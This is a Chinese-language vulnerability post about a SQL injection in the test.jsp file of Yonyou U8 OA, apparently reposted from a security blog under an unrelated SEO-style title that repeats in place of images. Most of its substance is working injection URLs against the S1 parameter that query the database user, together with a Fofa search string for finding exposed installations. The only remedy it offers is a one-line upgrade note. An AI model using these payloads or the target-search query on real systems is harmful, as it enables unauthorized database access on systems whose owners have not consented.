用友sql server(用友u8api教程)

影响范围

用友U8 OA

漏洞类型

SQL注入

利用条件

影响范围

漏洞概述

用友U8 OA test.jsp文件存在SQL注入漏洞,由于与致远OA使用相同的文件,于是存在了同样的漏洞

漏洞复现

登录页面如下

http://x.x.x.x:8081/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))http://x.x.x.x:8081/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(user()))

用友sql server(用友u8api教程)

用友sql server(用友u8api教程)

或者直接查询user也可以:

http://x.x.x.x:8081/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20user())

用友sql server(用友u8api教程)

漏洞检索

Fofa:

app=\\\"用友U8+OA基础版\\\"

安全建议

升级到最新版本~

原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34244.html

(0)
七芒星实验室's avatar七芒星实验室
上一篇 2024年4月18日 下午7:32
下一篇 2024年4月18日 下午7:34

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注